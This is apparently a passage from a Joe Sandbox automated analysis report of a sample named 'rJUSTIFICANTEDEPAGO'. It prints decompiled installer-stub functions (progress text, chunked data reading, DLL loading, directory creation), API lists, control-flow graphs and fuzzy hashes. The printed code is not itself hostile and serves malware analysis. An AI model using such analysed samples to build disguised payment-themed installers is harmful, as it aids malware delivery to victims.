                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                        • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                          • Part of subcall function 00405E32: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,00402629,00000000,00000000,?,00000000,00000011), ref: 00405E48
                                        • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
                                        • Instruction ID: 9be2b0b37b52d723af7ab0687330b4cdc43bee68c69c879290400e1721267ab5
                                        • Opcode Fuzzy Hash: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
                                        • Instruction Fuzzy Hash: BA51F675D00219AADF20DFA5DA88AAEB779FF04304F10443BE511F72D0DBB89982CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 675 4052c3-4052d8 676 4052de-4052ef 675->676 677 40538f-405393 675->677 678 4052f1-4052f5 call 406281 676->678 679 4052fa-405306 lstrlenW 676->679 678->679 680 405323-405327 679->680 681 405308-405318 lstrlenW 679->681 684 405336-40533a 680->684 685 405329-405330 SetWindowTextW 680->685 681->677 683 40531a-40531e lstrcatW 681->683 683->680 686 405380-405382 684->686 687 40533c-40537e SendMessageW * 3 684->687 685->684 686->677 688 405384-405387 686->688 687->686 688->677
                                        C-Code - Quality: 100%
                                        			E004052C3(signed int _a4, WCHAR* _a8) {
                                        				struct HWND__* _v8;
                                        				signed int _v12;
                                        				WCHAR* _v32;
                                        				long _v44;
                                        				int _v48;
                                        				void* _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				WCHAR* _t27;
                                        				signed int _t28;
                                        				long _t29;
                                        				signed int _t37;
                                        				signed int _t38;
                                        
                                        				_t27 =  *0x7a7a04; // 0x1038a
                                        				_v8 = _t27;
                                        				if(_t27 != 0) {
                                        					_t37 =  *0x7a8af4;
                                        					_v12 = _t37;
                                        					_t38 = _t37 & 0x00000001;
                                        					if(_t38 == 0) {
                                        						E00406281(_t38, 0, 0x7a0f00, 0x7a0f00, _a4);
                                        					}
                                        					_t27 = lstrlenW(0x7a0f00);
                                        					_a4 = _t27;
                                        					if(_a8 == 0) {
                                        						L6:
                                        						if((_v12 & 0x00000004) == 0) {
                                        							_t27 = SetWindowTextW( *0x7a79e8, 0x7a0f00); // executed
                                        						}
                                        						if((_v12 & 0x00000002) == 0) {
                                        							_v32 = 0x7a0f00;
                                        							_v52 = 1;
                                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                        							_v44 = 0;
                                        							_v48 = _t29 - _t38;
                                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                        						}
                                        						if(_t38 != 0) {
                                        							_t28 = _a4;
                                        							0x7a0f00[_t28] = 0;
                                        							return _t28;
                                        						}
                                        					} else {
                                        						_t27 = lstrlenW(_a8) + _a4;
                                        						if(_t27 < 0x1000) {
                                        							_t27 = lstrcatW(0x7a0f00, _a8);
                                        							goto L6;
                                        						}
                                        					}
                                        				}
                                        				return _t27;
                                        			}

















                                        0x004052c9
                                        0x004052d3
                                        0x004052d8
                                        0x004052de
                                        0x004052e9
                                        0x004052ec
                                        0x004052ef
                                        0x004052f5
                                        0x004052f5
                                        0x004052fb
                                        0x00405303
                                        0x00405306
                                        0x00405323
                                        0x00405327
                                        0x00405330
                                        0x00405330
                                        0x0040533a
                                        0x00405343
                                        0x0040534f
                                        0x00405356
                                        0x0040535a
                                        0x0040535d
                                        0x00405370
                                        0x0040537e
                                        0x0040537e
                                        0x00405382
                                        0x00405384
                                        0x00405387
                                        0x00000000
                                        0x00405387
                                        0x00405308
                                        0x00405310
                                        0x00405318
                                        0x0040531e
                                        0x00000000
                                        0x0040531e
                                        0x00405318
                                        0x00405306
                                        0x00405393

                                        APIs
                                        • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                        • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                        • lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                        • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
                                        • Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
                                        • Opcode Fuzzy Hash: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
                                        • Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 689 4065c9-4065e9 GetSystemDirectoryW 690 4065eb 689->690 691 4065ed-4065ef 689->691 690->691 692 406600-406602 691->692 693 4065f1-4065fa 691->693 695 406603-406636 wsprintfW LoadLibraryExW 692->695 693->692 694 4065fc-4065fe 693->694 694->695
                                        C-Code - Quality: 100%
                                        			E004065C9(intOrPtr _a4) {
                                        				short _v576;
                                        				signed int _t13;
                                        				struct HINSTANCE__* _t17;
                                        				signed int _t19;
                                        				void* _t24;
                                        
                                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                        				if(_t13 > 0x104) {
                                        					_t13 = 0;
                                        				}
                                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                        					_t19 = 1;
                                        				} else {
                                        					_t19 = 0;
                                        				}
                                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                        				return _t17;
                                        			}








                                        0x004065e0
                                        0x004065e9
                                        0x004065eb
                                        0x004065eb
                                        0x004065ef
                                        0x00406602
                                        0x004065fc
                                        0x004065fc
                                        0x004065fc
                                        0x0040661b
                                        0x0040662f
                                        0x00406636

                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                        • wsprintfW.USER32 ref: 0040661B
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                        • Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
                                        • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                        • Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 696 4030fa-403111 697 403113 696->697 698 40311a-403123 696->698 697->698 699 403125 698->699 700 40312c-403131 698->700 699->700 701 403141-40314e call 4032f2 700->701 702 403133-40313c call 403308 700->702 706 4032e0 701->706 707 403154-403158 701->707 702->701 708 4032e2-4032e3 706->708 709 40328b-40328d 707->709 710 40315e-403184 GetTickCount 707->710 713 4032eb-4032ef 708->713 711 4032cd-4032d0 709->711 712 40328f-403292 709->712 714 4032e8 710->714 715 40318a-403192 710->715 716 4032d2 711->716 717 4032d5-4032de call 4032f2 711->717 712->714 718 403294 712->718 714->713 719 403194 715->719 720 403197-4031a5 call 4032f2 715->720 716->717 717->706 728 4032e5 717->728 722 403297-40329d 718->722 719->720 720->706 730 4031ab-4031b4 720->730 725 4032a1-4032af call 4032f2 722->725 726 40329f 722->726 725->706 733 4032b1-4032b6 call 405e03 725->733 726->725 728->714 732 4031ba-4031da call 40679a 730->732 738 4031e0-4031f3 GetTickCount 732->738 739 403283-403285 732->739 737 4032bb-4032bd 733->737 742 403287-403289 737->742 743 4032bf-4032c9 737->743 740 4031f5-4031fd 738->740 741 40323e-403240 738->741 739->708 744 403205-403236 MulDiv wsprintfW call 4052c3 740->744 745 4031ff-403203 740->745 746 403242-403246 741->746 747 403277-40327b 741->747 742->708 743->722 748 4032cb 743->748 753 40323b 744->753 745->741 745->744 750 403248-40324f call 405e03 746->750 751 40325d-403268 746->751 747->715 752 403281 747->752 748->714 756 403254-403256 750->756 755 40326b-40326f 751->755 752->714 753->741 755->732 757 403275 755->757 756->742 758 403258-40325b 756->758 757->714 758->755
                                        C-Code - Quality: 95%
                                        			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                        				signed int _v8;
                                        				int _v12;
                                        				intOrPtr _v16;
                                        				long _v20;
                                        				intOrPtr _v24;
                                        				short _v152;
                                        				void* _t65;
                                        				void* _t69;
                                        				long _t70;
                                        				intOrPtr _t74;
                                        				long _t75;
                                        				intOrPtr _t76;
                                        				void* _t77;
                                        				int _t87;
                                        				intOrPtr _t91;
                                        				intOrPtr _t94;
                                        				long _t95;
                                        				signed int _t96;
                                        				int _t97;
                                        				int _t98;
                                        				intOrPtr _t99;
                                        				void* _t100;
                                        				void* _t101;
                                        
                                        				_t96 = _a16;
                                        				_t91 = _a12;
                                        				_v12 = _t96;
                                        				if(_t91 == 0) {
                                        					_v12 = 0x8000;
                                        				}
                                        				_v8 = _v8 & 0x00000000;
                                        				_v16 = _t91;
                                        				if(_t91 == 0) {
                                        					_v16 = 0x78f6d8;
                                        				}
                                        				_t62 = _a4;
                                        				if(_a4 >= 0) {
                                        					E00403308( *0x7a8a98 + _t62);
                                        				}
                                        				if(E004032F2( &_a16, 4) == 0) {
                                        					L41:
                                        					_push(0xfffffffd);
                                        					goto L42;
                                        				} else {
                                        					if((_a19 & 0x00000080) == 0) {
                                        						if(_t91 != 0) {
                                        							if(_a16 < _t96) {
                                        								_t96 = _a16;
                                        							}
                                        							if(E004032F2(_t91, _t96) != 0) {
                                        								_v8 = _t96;
                                        								L44:
                                        								return _v8;
                                        							} else {
                                        								goto L41;
                                        							}
                                        						}
                                        						if(_a16 <= _t91) {
                                        							goto L44;
                                        						}
                                        						_t87 = _v12;
                                        						while(1) {
                                        							_t97 = _a16;
                                        							if(_a16 >= _t87) {
                                        								_t97 = _t87;
                                        							}
                                        							if(E004032F2(0x78b6d8, _t97) == 0) {
                                        								goto L41;
                                        							}
                                        							_t69 = E00405E03(_a8, 0x78b6d8, _t97); // executed
                                        							if(_t69 == 0) {
                                        								L28:
                                        								_push(0xfffffffe);
                                        								L42:
                                        								_pop(_t65);
                                        								return _t65;
                                        							}
                                        							_v8 = _v8 + _t97;
                                        							_a16 = _a16 - _t97;
                                        							if(_a16 > 0) {
                                        								continue;
                                        							}
                                        							goto L44;
                                        						}
                                        						goto L41;
                                        					}
                                        					_t70 = GetTickCount();
                                        					 *0x40ce38 =  *0x40ce38 & 0x00000000;
                                        					_t14 =  &_a16;
                                        					 *_t14 = _a16 & 0x7fffffff;
                                        					_v20 = _t70;
                                        					 *0x40ce20 = 0xb;
                                        					_a4 = _a16;
                                        					if( *_t14 <= 0) {
                                        						goto L44;
                                        					} else {
                                        						goto L9;
                                        					}
                                        					while(1) {
                                        						L9:
                                        						_t98 = 0x4000;
                                        						if(_a16 < 0x4000) {
                                        							_t98 = _a16;
                                        						}
                                        						if(E004032F2(0x78b6d8, _t98) == 0) {
                                        							goto L41;
                                        						}
                                        						_a16 = _a16 - _t98;
                                        						 *0x40ce10 = 0x78b6d8;
                                        						 *0x40ce14 = _t98;
                                        						while(1) {
                                        							_t94 = _v16;
                                        							 *0x40ce18 = _t94;
                                        							 *0x40ce1c = _v12;
                                        							_t74 = E0040679A(0x40ce10);
                                        							_v24 = _t74;
                                        							if(_t74 < 0) {
                                        								break;
                                        							}
                                        							_t99 =  *0x40ce18; // 0x7924d8
                                        							_t100 = _t99 - _t94;
                                        							_t75 = GetTickCount();
                                        							_t95 = _t75;
                                        							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                        								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                        								_t101 = _t101 + 0xc;
                                        								E004052C3(0,  &_v152); // executed
                                        								_v20 = _t95;
                                        							}
                                        							if(_t100 == 0) {
                                        								if(_a16 > 0) {
                                        									goto L9;
                                        								}
                                        								goto L44;
                                        							} else {
                                        								if(_a12 != 0) {
                                        									_t76 =  *0x40ce18; // 0x7924d8
                                        									_v8 = _v8 + _t100;
                                        									_v12 = _v12 - _t100;
                                        									_v16 = _t76;
                                        									L23:
                                        									if(_v24 != 4) {
                                        										continue;
                                        									}
                                        									goto L44;
                                        								}
                                        								_t77 = E00405E03(_a8, _v16, _t100); // executed
                                        								if(_t77 == 0) {
                                        									goto L28;
                                        								}
                                        								_v8 = _v8 + _t100;
                                        								goto L23;
                                        							}
                                        						}
                                        						_push(0xfffffffc);
                                        						goto L42;
                                        					}
                                        					goto L41;
                                        				}
                                        			}


























                                        0x00403105
                                        0x00403109
                                        0x0040310c
                                        0x00403111
                                        0x00403113
                                        0x00403113
                                        0x0040311a
                                        0x0040311e
                                        0x00403123
                                        0x00403125
                                        0x00403125
                                        0x0040312c
                                        0x00403131
                                        0x0040313c
                                        0x0040313c
                                        0x0040314e
                                        0x004032e0
                                        0x004032e0
                                        0x00000000
                                        0x00403154
                                        0x00403158
                                        0x0040328d
                                        0x004032d0
                                        0x004032d2
                                        0x004032d2
                                        0x004032de
                                        0x004032e5
                                        0x004032e8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004032de
                                        0x00403292
                                        0x00000000
                                        0x00000000
                                        0x00403294
                                        0x00403297
                                        0x0040329a
                                        0x0040329d
                                        0x0040329f
                                        0x0040329f
                                        0x004032af
                                        0x00000000
                                        0x00000000
                                        0x004032b6
                                        0x004032bd
                                        0x00403287
                                        0x00403287
                                        0x004032e2
                                        0x004032e2
                                        0x00000000
                                        0x004032e2
                                        0x004032bf
                                        0x004032c2
                                        0x004032c9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004032cb
                                        0x00000000
                                        0x00403297
                                        0x00403164
                                        0x00403166
                                        0x0040316d
                                        0x0040316d
                                        0x00403174
                                        0x0040317a
                                        0x00403181
                                        0x00403184
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040318a
                                        0x0040318a
                                        0x0040318a
                                        0x00403192
                                        0x00403194
                                        0x00403194
                                        0x004031a5
                                        0x00000000
                                        0x00000000
                                        0x004031ab
                                        0x004031ae
                                        0x004031b4
                                        0x004031ba
                                        0x004031ba
                                        0x004031c5
                                        0x004031cb
                                        0x004031d0
                                        0x004031d7
                                        0x004031da
                                        0x00000000
                                        0x00000000
                                        0x004031e0
                                        0x004031e6
                                        0x004031e8
                                        0x004031f1
                                        0x004031f3
                                        0x00403224
                                        0x0040322a
                                        0x00403236
                                        0x0040323b
                                        0x0040323b
                                        0x00403240
                                        0x0040327b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403242
                                        0x00403246
                                        0x0040325d
                                        0x00403262
                                        0x00403265
                                        0x00403268
                                        0x0040326b
                                        0x0040326f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403275
                                        0x0040324f
                                        0x00403256
                                        0x00000000
                                        0x00000000
                                        0x00403258
                                        0x00000000
                                        0x00403258
                                        0x00403240
                                        0x00403283
                                        0x00000000
                                        0x00403283
                                        0x00000000
                                        0x0040318a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                        • Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
                                        • Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                        • Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 759 405792-4057dd CreateDirectoryW 760 4057e3-4057f0 GetLastError 759->760 761 4057df-4057e1 759->761 762 40580a-40580c 760->762 763 4057f2-405806 SetFileSecurityW 760->763 761->762 763->761 764 405808 GetLastError 763->764 764->762
                                        C-Code - Quality: 100%
                                        			E00405792(WCHAR* _a4) {
                                        				struct _SECURITY_ATTRIBUTES _v16;
                                        				struct _SECURITY_DESCRIPTOR _v36;
                                        				int _t22;
                                        				long _t23;
                                        
                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                        				_v36.Owner = 0x4083f0;
                                        				_v36.Group = 0x4083f0;
                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                        				_v16.lpSecurityDescriptor =  &_v36;
                                        				_v36.Revision = 1;
                                        				_v36.Control = 4;
                                        				_v36.Dacl = 0x4083e0;
                                        				_v16.nLength = 0xc;
                                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                        				if(_t22 != 0) {
                                        					L1:
                                        					return 0;
                                        				}
                                        				_t23 = GetLastError();
                                        				if(_t23 == 0xb7) {
                                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                        						goto L1;
                                        					}
                                        					return GetLastError();
                                        				}
                                        				return _t23;
                                        			}







                                        0x0040579d
                                        0x004057a1
                                        0x004057a4
                                        0x004057aa
                                        0x004057ae
                                        0x004057b2
                                        0x004057ba
                                        0x004057c1
                                        0x004057c7
                                        0x004057ce
                                        0x004057d5
                                        0x004057dd
                                        0x004057df
                                        0x00000000
                                        0x004057df
                                        0x004057e9
                                        0x004057f0
                                        0x00405806
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405808
                                        0x0040580c

                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                        • GetLastError.KERNEL32 ref: 004057E9
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
                                        • GetLastError.KERNEL32 ref: 00405808
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 3449924974-3370423016
